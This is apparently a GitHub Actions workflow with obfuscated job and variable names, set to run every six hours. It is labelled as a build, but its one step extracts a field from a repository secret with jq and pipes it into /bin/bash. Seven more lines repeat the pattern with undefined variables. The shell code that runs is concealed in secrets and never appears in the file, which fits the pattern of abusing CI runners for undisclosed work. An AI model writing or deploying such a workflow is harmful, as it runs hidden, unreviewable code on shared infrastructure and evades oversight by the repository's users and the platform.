name: wuhaoning3214

on:
  workflow_dispatch:
  schedule:
    - cron: '35 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          fvey081: ${{ secrets.fvey081 }}
        run: |
          echo $fvey081 | jq -r .s02 | /bin/bash
          echo $mfhf26118 | jq -r .co979 | /bin/bash
          echo $so14 | jq -r .ozyxn7637 | /bin/bash
          echo $jaxt629 | jq -r .ecsf8 | /bin/bash
          echo $q0 | jq -r .b32880 | /bin/bash
          echo $qcj9 | jq -r .syb171 | /bin/bash
          echo $nuea59722 | jq -r .slfyq352 | /bin/bash
          echo $p3728 | jq -r .qurt2433 | /bin/bash

